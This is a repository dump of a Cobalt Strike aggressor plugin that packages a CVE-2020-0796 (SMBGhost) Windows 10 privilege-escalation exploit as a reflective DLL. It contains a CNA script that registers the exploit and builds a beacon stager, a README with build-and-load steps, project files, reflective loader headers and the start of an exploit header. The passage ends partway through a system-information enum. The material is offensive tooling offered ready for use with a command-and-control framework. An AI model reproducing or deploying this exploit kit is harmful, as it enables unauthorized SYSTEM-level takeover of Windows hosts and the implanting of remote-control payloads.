18363) { 10 | berror($1, "This exploit only supports Windows 10 versions 1903 - 1909"); 11 | return; 12 | } 13 | if (!-is64 $1) { 14 | berror($1, "cve-2020-0796 exploit is x64 only"); 15 | return; 16 | } 17 | btask($1, "Task Beacon to run " . listener_describe($2) . " cve-2020-0796"); 18 | $stager = payload_local($1, $2, "x64", "thread"); 19 | $stager = pack("I-", strlen($stager)) . 
$stager; 20 | $dll = getFileProper(script_resource("modules"), "reflective_dll.x64.dll"); 21 | #bdllspawn!($1, getFileProper(script_resource("modules"), "reflective_dll.x64.dll"), $stager, "cve-2020-0796", 5000); 22 | #beacon_link($1, $null, $3['listener']); 23 | } 24 | beacon_exploit_register("CVE_2020_0796", "CVE-2020-0796", &CVE_2020_0796); 25 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/README.md: -------------------------------------------------------------------------------- 1 | # Cobalt Strike CVE-2020-0796 CNA 2 | 3 | #### 1.Compiled source code,copy dll to modules/CVE_2020_0796.dll. 4 | 5 | #### 2.Use Cobalt_Strike Load cna. 6 | ![](https://cdn.jsdelivr.net/gh/yanghaoi/ReflectiveDllSource/CVE-2020-0796_CNA/images/RUN.gif) 7 | 8 | #### 3.Get Test OS: 9 | Get iso:https://msdn.itellyou.cn/ , cn_windows_10_consumer_editions_version_1909_x64_dvd_76365bf8.iso 10 | 11 | ed2k://|file|cn_windows_10_consumer_editions_version_1909_x64_dvd_76365bf8.iso|5381154816|6A56DE112B164EC054D1104C53F8F10B|/ 12 | 13 | #### 4. 
Pages 14 | [CVE_2020_0796_LPE](https://yanghaoi.github.io/2021/04/22/cobalt-strike-cha-jian-zhi-cve-2020-0796-ti-quan-jiao-ben-kai-fa/) 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/images/RUN.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0796_CNA/images/RUN.gif -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30503.244 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|Win32 = Debug|Win32 12 | Debug|x64 = Debug|x64 13 | Release|ARM = Release|ARM 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|x64 19 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|x64 20 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 21 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 22 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|x64 23 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|x64 24 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 25 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = 
Release|x64 26 | EndGlobalSection 27 | GlobalSection(SolutionProperties) = preSolution 28 | HideSolutionNode = FALSE 29 | EndGlobalSection 30 | GlobalSection(ExtensibilityGlobals) = postSolution 31 | SolutionGuid = {F460160A-E250-413C-B7FD-6E69491ABB24} 32 | EndGlobalSection 33 | EndGlobal 34 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 15 | 18 | 19 | 20 | 21 | 22 | 29 | 32 | 35 | 38 | 41 | 44 | 55 | 58 | 61 | 64 | 71 | 74 | 77 | 80 | 83 | 86 | 89 | 92 | 93 | 100 | 103 | 106 | 109 | 112 | 116 | 127 | 130 | 133 | 136 | 143 | 146 | 149 | 152 | 155 | 158 | 161 | 164 | 165 | 173 | 176 | 179 | 182 | 185 | 188 | 200 | 203 | 206 | 209 | 218 | 221 | 224 | 227 | 230 | 233 | 236 | 240 | 241 | 249 | 252 | 255 | 258 | 261 | 265 | 280 | 283 | 286 | 289 | 299 | 302 | 305 | 308 | 311 | 314 | 317 | 321 | 322 | 323 | 324 | 325 | 326 | 331 | 334 | 335 | 338 | 339 | 340 | 345 | 348 | 349 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Release 6 | x64 7 | 8 | 9 | 10 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} 11 | reflective_dll 12 | Win32Proj 13 | 10.0 14 | 15 | 16 | 17 | DynamicLibrary 18 | v142 19 | MultiByte 20 | false 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | <_ProjectFileVersion>11.0.50727.1 31 | 32 | 33 | $(SolutionDir)$(Platform)\$(Configuration)\ 34 | $(Platform)\$(Configuration)\ 35 | false 36 | false 37 | $(ProjectName).x64 38 | false 39 | 40 | 41 | 42 | X64 43 | 44 | 45 | MinSpace 46 | OnlyExplicitInline 47 | true 48 | Size 49 | false 50 | 
WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 51 | MultiThreadedDLL 52 | true 53 | 54 | Level3 55 | ProgramDatabase 56 | CompileAsCpp 57 | false 58 | 59 | 60 | $(OutDir)$(ProjectName).x64.dll 61 | false 62 | Windows 63 | true 64 | true 65 | MachineX64 66 | 67 | 68 | copy $(OutDir)$(ProjectName).x64.dll ..\bin\ 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/reflective_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 
4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 
10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | #include 34 | #include 35 | 36 | #include "ReflectiveDLLInjection.h" 37 | 38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); 39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); 40 | typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); 41 | typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); 42 | 43 | #define KERNEL32DLL_HASH 0x6A4ABC5B 44 | #define NTDLLDLL_HASH 0x3CFA685D 45 | 46 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 47 | #define GETPROCADDRESS_HASH 0x7C0DFCAA 48 | #define VIRTUALALLOC_HASH 0x91AFCA54 49 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 50 | 51 | #define IMAGE_REL_BASED_ARM_MOV32A 5 52 | #define IMAGE_REL_BASED_ARM_MOV32T 7 53 | 54 | #define ARM_MOV_MASK (DWORD)(0xFBF08000) 55 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) 56 | #define ARM_MOVW 0xF2400000 57 | #define ARM_MOVT 0xF2C00000 58 | 59 | #define HASH_KEY 13 60 | //===============================================================================================// 61 | #pragma intrinsic( _rotr ) 62 | 63 | __forceinline DWORD ror( DWORD d ) 64 | { 65 | return _rotr( d, HASH_KEY ); 66 | } 67 | 68 | __forceinline DWORD hash( char * c ) 69 | { 70 | register DWORD h = 0; 71 | do 72 | { 73 | h = ror( h ); 74 | h += *c; 75 | } while( *++c ); 76 | 77 | return h; 78 | } 79 | //===============================================================================================// 80 | typedef struct _UNICODE_STR 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR pBuffer; 85 | } UNICODE_STR, *PUNICODE_STR; 86 | 87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY 88 | 
//__declspec( align(8) ) 89 | typedef struct _LDR_DATA_TABLE_ENTRY 90 | { 91 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 92 | LIST_ENTRY InMemoryOrderModuleList; 93 | LIST_ENTRY InInitializationOrderModuleList; 94 | PVOID DllBase; 95 | PVOID EntryPoint; 96 | ULONG SizeOfImage; 97 | UNICODE_STR FullDllName; 98 | UNICODE_STR BaseDllName; 99 | ULONG Flags; 100 | SHORT LoadCount; 101 | SHORT TlsIndex; 102 | LIST_ENTRY HashTableEntry; 103 | ULONG TimeDateStamp; 104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 105 | 106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA 107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes 108 | { 109 | DWORD dwLength; 110 | DWORD dwInitialized; 111 | LPVOID lpSsHandle; 112 | LIST_ENTRY InLoadOrderModuleList; 113 | LIST_ENTRY InMemoryOrderModuleList; 114 | LIST_ENTRY InInitializationOrderModuleList; 115 | LPVOID lpEntryInProgress; 116 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 117 | 118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK 119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes 120 | { 121 | struct _PEB_FREE_BLOCK * pNext; 122 | DWORD dwSize; 123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 124 | 125 | // struct _PEB is defined in Winternl.h but it is incomplete 126 | // WinDbg> dt -v ntdll!_PEB 127 | typedef struct __PEB // 65 elements, 0x210 bytes 128 | { 129 | BYTE bInheritedAddressSpace; 130 | BYTE bReadImageFileExecOptions; 131 | BYTE bBeingDebugged; 132 | BYTE bSpareBool; 133 | LPVOID lpMutant; 134 | LPVOID lpImageBaseAddress; 135 | PPEB_LDR_DATA pLdr; 136 | LPVOID lpProcessParameters; 137 | LPVOID lpSubSystemData; 138 | LPVOID lpProcessHeap; 139 | PRTL_CRITICAL_SECTION pFastPebLock; 140 | LPVOID lpFastPebLockRoutine; 141 | LPVOID lpFastPebUnlockRoutine; 142 | DWORD dwEnvironmentUpdateCount; 143 | LPVOID lpKernelCallbackTable; 144 | DWORD dwSystemReserved; 145 | DWORD dwAtlThunkSListPtr32; 146 | PPEB_FREE_BLOCK pFreeList; 147 | DWORD dwTlsExpansionCounter; 
148 | LPVOID lpTlsBitmap; 149 | DWORD dwTlsBitmapBits[2]; 150 | LPVOID lpReadOnlySharedMemoryBase; 151 | LPVOID lpReadOnlySharedMemoryHeap; 152 | LPVOID lpReadOnlyStaticServerData; 153 | LPVOID lpAnsiCodePageData; 154 | LPVOID lpOemCodePageData; 155 | LPVOID lpUnicodeCaseTableData; 156 | DWORD dwNumberOfProcessors; 157 | DWORD dwNtGlobalFlag; 158 | LARGE_INTEGER liCriticalSectionTimeout; 159 | DWORD dwHeapSegmentReserve; 160 | DWORD dwHeapSegmentCommit; 161 | DWORD dwHeapDeCommitTotalFreeThreshold; 162 | DWORD dwHeapDeCommitFreeBlockThreshold; 163 | DWORD dwNumberOfHeaps; 164 | DWORD dwMaximumNumberOfHeaps; 165 | LPVOID lpProcessHeaps; 166 | LPVOID lpGdiSharedHandleTable; 167 | LPVOID lpProcessStarterHelper; 168 | DWORD dwGdiDCAttributeList; 169 | LPVOID lpLoaderLock; 170 | DWORD dwOSMajorVersion; 171 | DWORD dwOSMinorVersion; 172 | WORD wOSBuildNumber; 173 | WORD wOSCSDVersion; 174 | DWORD dwOSPlatformId; 175 | DWORD dwImageSubsystem; 176 | DWORD dwImageSubsystemMajorVersion; 177 | DWORD dwImageSubsystemMinorVersion; 178 | DWORD dwImageProcessAffinityMask; 179 | DWORD dwGdiHandleBuffer[34]; 180 | LPVOID lpPostProcessInitRoutine; 181 | LPVOID lpTlsExpansionBitmap; 182 | DWORD dwTlsExpansionBitmapBits[32]; 183 | DWORD dwSessionId; 184 | ULARGE_INTEGER liAppCompatFlags; 185 | ULARGE_INTEGER liAppCompatFlagsUser; 186 | LPVOID lppShimData; 187 | LPVOID lpAppCompatInfo; 188 | UNICODE_STR usCSDVersion; 189 | LPVOID lpActivationContextData; 190 | LPVOID lpProcessAssemblyStorageMap; 191 | LPVOID lpSystemDefaultActivationContextData; 192 | LPVOID lpSystemAssemblyStorageMap; 193 | DWORD dwMinimumStackCommit; 194 | } _PEB, * _PPEB; 195 | 196 | typedef struct 197 | { 198 | WORD offset:12; 199 | WORD type:4; 200 | } IMAGE_RELOC, *PIMAGE_RELOC; 201 | //===============================================================================================// 202 | #endif 203 | //===============================================================================================// 204 | 
-------------------------------------------------------------------------------- /CVE-2020-0796_CNA/src/exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef _EXPLOIT_H 2 | #define _EXPLOIT_H 3 | 4 | #include 5 | 6 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { 7 | PVOID Object; 8 | ULONG_PTR UniqueProcessId; 9 | ULONG_PTR HandleValue; 10 | ULONG GrantedAccess; 11 | USHORT CreatorBackTraceIndex; 12 | USHORT ObjectTypeIndex; 13 | ULONG HandleAttributes; 14 | ULONG Reserved; 15 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; 16 | 17 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX { 18 | ULONG_PTR NumberOfHandles; 19 | ULONG_PTR Reserved; 20 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; 21 | } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; 22 | 23 | typedef enum _SYSTEM_INFORMATION_CLASS { 24 | SystemBasicInformation = 0, 25 | SystemProcessorInformation = 1, 26 | SystemPerformanceInformation = 2, 27 | SystemTimeOfDayInformation = 3, 28 | SystemPathInformation = 4, 29 | SystemProcessInformation = 5, 30 | SystemCallCountInformation = 6, 31 | SystemDeviceInformation = 7, 32 | SystemProcessorPerformanceInformation = 8, 33 | SystemFlagsInformation = 9, 34 | SystemCallTimeInformation = 10, 35 | SystemModuleInformation = 11, 36 | SystemLocksInformation = 12, 37 | SystemStackTraceInformation = 13, 38 | SystemPagedPoolInformation = 14, 39 | SystemNonPagedPoolInformation = 15, 40 | SystemHandleInformation = 16, 41 | SystemObjectInformation = 17, 42 | SystemPageFileInformation = 18, 43 | SystemVdmInstemulInformation = 19, 44 | SystemVdmBopInformation = 20, 45 | SystemFileCacheInformation = 21, 46 | SystemPoolTagInformation = 22, 47 | SystemInterruptInformation = 23, 48 | SystemDpcBehaviorInformation = 24, 49 | SystemFullMemoryInformation = 25, 50 | SystemLoadGdiDriverInformation = 26, 51 | SystemUnloadGdiDriverInformation = 27, 52 | SystemTimeAdjustmentInformation = 28, 53 | 
SystemSummaryMemoryInformation = 29, 54 | SystemMirrorMemoryInformation = 30, 55 | SystemPerformanceTraceInformation = 31, 56 | SystemObsolete0 = 32, 57 | SystemExceptionInformation = 33, 58 | SystemCrashDumpStateInformation = 34, 59 | SystemKernelDebuggerInformation = 35, 60 | SystemContextSwitchInformation = 36, 61 | SystemRegistryQuotaInformation = 37, 62 | SystemExtendServiceTableInformation = 38, 63 | SystemPrioritySeperation = 39, 64 | SystemVerifierAddDriverInformation = 40, 65 | SystemVerifierRemoveDriverInformation = 41, 66 | SystemProcessorIdleInformation = 42, 67 | SystemLegacyDriverInformation = 43, 68 | SystemCurrentTimeZoneInformation = 44, 69 | SystemLookasideInformation = 45, 70 | SystemTimeSlipNotification = 46, 71 | SystemSessionCreate = 47, 72 | SystemSessionDetach = 48, 73 | SystemSessionInformation = 49, 74 | SystemRangeStartInformation = 50, 75 | SystemVerifierInformation = 51, 76 | SystemVerifierThunkExtend = 52, 77 | SystemSessionProcessInformation = 53, 78 | SystemLoadGdiDriverInSystemSpace = 54, 79 | SystemNumaProcessorMap = 55, 80 | SystemPrefetcherInformation = 56, 81 | SystemExtendedProcessInformation = 57, 82 | SystemRecommendedSharedDataAlignment = 58, 83 | SystemComPlusPackage = 59, 84 | SystemNumaAvailableMemory = 60, 85 | SystemProcessorPowerInformation = 61, 86 | SystemEmulationBasicInformation = 62, 87 | SystemEmulationProcessorInformation = 63, 88 | SystemExtendedHandleInformation = 64, 89 | SystemLostDelayedWriteInformation = 65, 90 | SystemBigPoolInformation = 66, 91 | SystemSessionPoolTagInformation = 67, 92 | SystemSessionMappedViewInformation = 68, 93 | SystemHotpatchInformation = 69, 94 | SystemObjectSecurityMode = 70, 95 | SystemWatchdogTimerHandler = 71, 96 | SystemWatchdogTimerInformation = 72, 97 | SystemLogicalProcessorInformation = 73, 98 | SystemWow64SharedInformationObsolete = 74, 99 | SystemRegisterFirmwareTableInformationHandler = 75, 100 | SystemFirmwareTableInformation = 76, 101 | SystemModuleInformationEx = 
77, 102 | SystemVerifierTriageInformation = 78, 103 | SystemSuperfetchInformation = 79, 104 | SystemMemoryListInformation = 80, 105 | SystemFileCacheInformationEx = 81, 106 | SystemThreadPriorityClientIdInformation = 82, 107 | SystemProcessorIdleCycleTimeInformation = 83, 108 | SystemVerifierCancellationInformation = 84, 109 | SystemProcessorPowerInformationEx = 85, 110 | SystemRefTraceInformation = 86, 111 | SystemSpecialPoolInformation = 87, 112 | SystemProcessIdInformation = 88, 113 | SystemErrorPortInformation = 89, 114 | SystemBootEnvironmentInformation = 90, 115 | SystemHypervisorInformation = 91, 116 | SystemVerifierInformationEx = 92, 117 | SystemTimeZoneInformation = 93, 118 | SystemImageFileExecutionOptionsInformation = 94, 119 | SystemCoverageInformation = 95, 120 | SystemPrefetchPatchInformation = 96, 121 | SystemVerifierFaultsInformation = 97, 122 | SystemSystemPartitionInformation = 98, 123 | SystemSystemDiskInformation = 99, 124 | SystemProcessorPerformanceDistribution = 100, 125 | SystemNumaProximityNodeInformation = 101, 126 | SystemDynamicTimeZoneInformation = 102, 127 | SystemCodeIntegrityInformation = 103, 128 | SystemProcessorMicrocodeUpdateInformation = 104, 129 | SystemProcessorBrandString = 105, 130 | SystemVirtualAddressInformation = 106, 131 | SystemLogicalProcessorAndGroupInformation = 107, 132 | SystemProcessorCycleTimeInformation = 108, 133 | SystemStoreInformation = 109, 134 | SystemRegistryAppendString = 110, 135 | SystemAitSamplingValue = 111, 136 | SystemVhdBootInformation = 112, 137 | SystemCpuQuotaInformation = 113, 138 | SystemNativeBasicInformation = 114, 139 | SystemErrorPortTimeouts = 115, 140 | SystemLowPriorityIoInformation = 116, 141 | SystemBootEntropyInformation = 117, 142 | SystemVerifierCountersInformation = 118, 143 | SystemPagedPoolInformationEx = 119, 144 | SystemSystemPtesInformationEx = 120, 145 | SystemNodeDistanceInformation = 121, 146 | SystemAcpiAuditInformation = 122, 147 | SystemBasicPerformanceInformation = 
123, 148 | SystemQueryPerformanceCounterInformation = 124, 149 | SystemSessionBigPoolInformation = 125, 150 | SystemBootGraphicsInformation = 126, 151 | SystemScrubPhysicalMemoryInformation = 127, 152 | SystemBadPageInformation = 128, 153 | SystemProcessorProfileControlArea = 129, 154 | SystemCombinePhysicalMemoryInformation = 130, 155 | SystemEntropyInterruptTimingInformation = 131, 156 | SystemConsoleInformation = 132, 157 | SystemPlatformBinaryInformation = 133, 158 | SystemPolicyInformation = 134, 159 | SystemHypervisorProcessorCountInformation = 135, 160 | SystemDeviceDataInformation = 136, 161 | SystemDeviceDataEnumerationInformation = 137, 162 | SystemMemoryTopologyInformation = 138, 163 | SystemMemoryChannelInformation = 139, 164 | SystemBootLogoInformation = 140, 165 | SystemProcessorPerformanceInformationEx = 141, 166 | SystemSpare0 = 142, 167 | SystemSecureBootPolicyInformation = 143, 168 | SystemPageFileInformationEx = 144, 169 | SystemSecureBootInformation = 145, 170 | SystemEntropyInterruptTimingRawInformation = 146, 171 | SystemPortableWorkspaceEfiLauncherInformation = 147, 172 | SystemFullProcessInformation = 148, 173 | SystemKernelDebuggerInformationEx = 149, 174 | SystemBootMetadataInformation = 150, 175 | SystemSoftRebootInformation = 151, 176 | SystemElamCertificateInformation = 152, 177 | SystemOfflineDumpConfigInformation = 153, 178 | SystemProcessorFeaturesInformation = 154, 179 | SystemRegistryReconciliationInformation = 155, 180 | SystemEdidInformation = 156, 181 | SystemManufacturingInformation = 157, 182 | SystemEnergyEstimationConfigInformation = 158, 183 | SystemHypervisorDetailInformation = 159, 184 | SystemProcessorCycleStatsInformation = 160, 185 | SystemVmGenerationCountInformation = 161, 186 | SystemTrustedPlatformModuleInformation = 162, 187 | SystemKernelDebuggerFlags = 163, 188 | SystemCodeIntegrityPolicyInformation = 164, 189 | SystemIsolatedUserModeInformation = 165, 190 | SystemHardwareSecurityTestInterfaceResultsInformation 
= 166, 191 | SystemSingleModuleInformation = 167, 192 | SystemAllowedCpuSetsInformation = 168, 193 | SystemDmaProtectionInformation = 169, 194 | SystemInterruptCpuSetsInformation = 170, 195 | SystemSecureBootPolicyFullInformation = 171, 196 | SystemCodeIntegrityPolicyFullInformation = 172, 197 | SystemAffinitizedInterruptProcessorInformation = 173, 198 | SystemRootSiloInformation = 174, 199 | SystemCpuSetInformation = 175, 200 | SystemCpuSetTagInformation = 176, 201 | SystemWin32WerStartCallout = 177, 202 | SystemSecureKernelProfileInformation = 178, 203 | SystemCodeIntegrityPlatformManifestInformation = 179, 204 | SystemInterruptSteeringInformation = 180, 205 | SystemSupportedProcessorArchitectures = 181, 206 | SystemMemoryUsageInformation = 182, 207 | SystemCodeIntegrityCertificateInformation = 183, 208 | SystemPhysicalMemoryInformation = 184, 209 | SystemControlFlowTransition = 185, 210 | SystemKernelDebuggingAllowed = 186, 211 | SystemActivityModerationExeState = 187, 212 | SystemActivityModerationUserSettings = 188, 213 | SystemCodeIntegrityPoliciesFullInformation = 189, 214 | SystemCodeIntegrityUnlockInformation = 190, 215 | SystemIntegrityQuotaInformation = 191, 216 | SystemFlushInformation = 192, 217 | SystemProcessorIdleMaskInformation = 193, 218 | SystemSecureDumpEncryptionInformation = 194, 219 | SystemWriteConstraintInformation = 195, 220 | SystemKernelVaShadowInformation = 196, 221 | SystemHypervisorSharedPageInformation = 197, 222 | SystemFirmwareBootPerformanceInformation = 198, 223 | SystemCodeIntegrityVerificationInformation = 199, 224 | SystemFirmwarePartitionInformation = 200, 225 | SystemSpeculationControlInformation = 201, 226 | SystemDmaGuardPolicyInformation = 202, 227 | SystemEnclaveLaunchControlInformation = 203, 228 | SystemWorkloadAllowedCpuSetsInformation = 204, 229 | SystemCodeIntegrityUnlockModeInformation = 205, 230 | SystemLeapSecondInformation = 206, 231 | SystemFlags2Information = 207, 232 | SystemSecurityModelInformation = 208, 
